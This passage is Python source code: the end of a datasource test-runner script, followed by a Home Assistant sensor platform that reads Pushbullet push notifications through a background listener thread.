print("\tTests run: " + str(total_tests_run))
print("\tDisabled tests: " + str(disabled_tests))
print("\tSkipped tests: " + str(skipped_tests))
print("\nOther information:")
print("\tSmoke test time: {} seconds".format(smoke_test_run_time))
print("\tMain test time: {} seconds".format(main_test_time))
print("\tTotal time: {} seconds".format(total_run_time))
return failed_tests, skipped_tests, disabled_tests, total_tests
def get_ds_list(ds):
if not ds:
return []
ds_list = ds[0].split(',')
ds_list = [x.strip() for x in ds_list]
return ds_list
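# Resolve the requested datasource names, apply any per-datasource thread settings from the .ini files,
# queue up the matching test sets and run them.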
def run_desired_tests(args, ds_registry):
generate_files(ds_registry, False)
ds_to_run = ds_registry.get_datasources(get_ds_list(args.ds))
if not ds_to_run:
sys.exit(0)
if len(ds_to_run) > 0:
delete_output_files(os.getcwd())
if not tabquerycli_exists():
print("Could not find Tabquerycli.")
sys.exit(0)
max_threads = get_level_of_parallelization(args)
test_sets: List[TestSet] = []
for ds in ds_to_run:
ds_info = ds_registry.get_datasource_info(ds)
if not ds_info:
continue
print("Testing " + ds)
        max_threads_per_datasource = ds_info.run_time_config.maxthread
        # If multiple datasources are being run, the per-datasource thread setting cannot be applied.
if max_threads_per_datasource > 0:
print("thread setting in " + ds + ".ini = " + str(max_threads_per_datasource))
if len(ds_to_run) == 1:
max_threads = max_threads_per_datasource
else:
print("Setting cannot apply since you are running multiple datasources.")
suite = ds
if args.command == 'run-pattern':
single_test, single_test_config = enqueue_single_test(args, ds_info, suite)
if single_test:
test_sets.extend([(single_test, single_test_config)])
else:
test_sets.extend(enqueue_tests(ds_info, args, suite))
failed_tests, skipped_tests, disabled_tests, total_tests = run_tests_impl(test_sets, max_threads, args)
return failed_tests
def run_connectors_test(args):
if not tabquerycli_exists():
print("Could not find Tabquerycli.")
sys.exit(0)
if not args.conn_test or not args.conn_test_file:
print("Missing arguments. Not running Connectors Test")
sys.exit(0)
if args.conn_test_password_file:
print(run_connectors_test_core( args.conn_test, args.conn_test_file, args.conn_test_password_file))
else:
print(run_connectors_test_core( args.conn_test, args.conn_test_file))
def run_file(run_file: Path, output_dir: Path, threads: int, args) -> int:
"""Rerun all the failed tests listed in the json file."""
logging.debug("Running failed tests from : " + str(run_file))
# See if we need to generate test setup files.
root_directory = get_root_dir()
failed_tests, skipped_tests, disabled_tests, total_tests = \
run_tests_impl(enqueue_failed_tests(run_file, root_directory, args), threads, args)
# This can be a retry-step.
return 0
def run_generate(ds_registry):
start_time = time.time()
generate_files(ds_registry, True)
end_time = time.time() - start_time
print("Done: " + str(end_time))
def main():
parser, ds_registry, args = init()
if args.command == 'action':
if args.setup:
print("Creating setup files...")
create_test_environment()
sys.exit(0)
elif args.add_ds:
add_datasource(args.add_ds, ds_registry)
generate_files(ds_registry, True)
sys.exit(0)
elif args.action_generate:
run_generate(ds_registry)
sys.exit(0)
elif is_test(args):
if args.generate:
run_generate(ds_registry)
# It's ok to call generate and then run some tests, so don't exit here.
if args.command == 'run-file':
output_dir = os.getcwd()
max_threads = get_level_of_parallelization(args)
sys.exit(run_file(Path(args.run_file), Path(output_dir), max_threads, args))
if args.command == 'run-connectors-test':
run_connectors_test(args)
sys.exit(0)
error_code = run_desired_tests(args, ds_registry)
sys.exit(error_code)
elif args.command == 'action' and args.diff:
tdvt_invocation = TdvtInvocation(from_args=args)
run_diff(tdvt_invocation, args.diff)
sys.exit(0)
elif args.command == 'list-logical-configs':
print_logical_configurations(ds_registry, args.list_logical_configs)
sys.exit(0)
elif args.command == 'list':
print_configurations(ds_registry, [args.list_ds], args.verbose)
sys.exit(0)
logging.error("Could not interpret arguments. Nothing done.")
parser.print_help()
sys.exit(-1)
if __name__ == '__main__':
main()
|
sensor.py
|
"""Pushbullet platform for sensor component."""
import logging
import threading
from pushbullet import InvalidKeyError, Listener, PushBullet
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_API_KEY, CONF_MONITORED_CONDITIONS
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
SENSOR_TYPES = {
"application_name": ["Application name"],
"body": ["Body"],
"notification_id": ["Notification ID"],
"notification_tag": ["Notification tag"],
"package_name": ["Package name"],
"receiver_email": ["Receiver email"],
"sender_email": ["Sender email"],
"source_device_iden": ["Sender device ID"],
"title": ["Title"],
"type": ["Type"],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_MONITORED_CONDITIONS, default=["title", "body"]): vol.All(
cv.ensure_list, vol.Length(min=1), [vol.In(SENSOR_TYPES)]
),
}
)
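# Example configuration.yaml entry (illustrative; key names follow the schema above):
#
# sensor:
#   - platform: pushbullet
#     api_key: YOUR_PUSHBULLET_API_KEY
#     monitored_conditions:
#       - title
#       - body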
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Pushbullet Sensor platform."""
try:
pushbullet = PushBullet(config.get(CONF_API_KEY))
except InvalidKeyError:
_LOGGER.error("Wrong API key for Pushbullet supplied")
return False
pbprovider = PushBulletNotificationProvider(pushbullet)
devices = []
for sensor_type in config[CONF_MONITORED_CONDITIONS]:
devices.append(PushBulletNotificationSensor(pbprovider, sensor_type))
add_entities(devices)
class PushBulletNotificationSensor(Entity):
"""Representation of a Pushbullet Sensor."""
def __init__(self, pb, element):
"""Initialize the Pushbullet sensor."""
self.pushbullet = pb
self._element = element
self._state = None
self._state_attributes = None
def update(self):
"""Fetch the latest data from the sensor.
This will fetch the 'sensor reading' into self._state but also all
attributes into self._state_attributes.
"""
try:
self._state = self.pushbullet.data[self._element]
self._state_attributes = self.pushbullet.data
except (KeyError, TypeError):
pass
@property
def name(self):
"""Return the name of the sensor."""
return f"Pushbullet {self._element}"
@property
def state(self):
"""Return the current state of the sensor."""
return self._state
@property
def extra_state_attributes(self):
"""Return all known attributes of the sensor."""
return self._state_attributes
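# Runs the Pushbullet realtime Listener on a daemon thread and caches the most recent push so every
# sensor created above can read it via the `data` property.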
class PushBulletNotificationProvider:
"""Provider for an account, leading to one or more sensors."""
def __init__(self, pb):
"""Start to retrieve pushes from the given Pushbullet instance."""
self.pushbullet = pb
self._data = None
self.listener = None
self.thread = threading.Thread(target=self.retrieve_pushes)
self.thread.daemon = True
self.thread.start()
def on_push(self, data):
"""Update the current data.
Currently only monitors pushes but might be extended to monitor
different kinds of Pushbullet events.
"""
if data["type"] == "push":
self._data = data["push"]
@property
def data(self):
"""Return the current data stored in the provider."""
return self._data
def retrieve_pushes(self):
"""Retrieve_pushes.
Spawn a new Listener and links it to self.on_push.
"""
self.listener = Listener(account=self.pushbullet, on_push=self.on_push)
_LOGGER.debug("Getting pushes")
try:
self.listener.run_forever()
finally:
self.listener.close()
|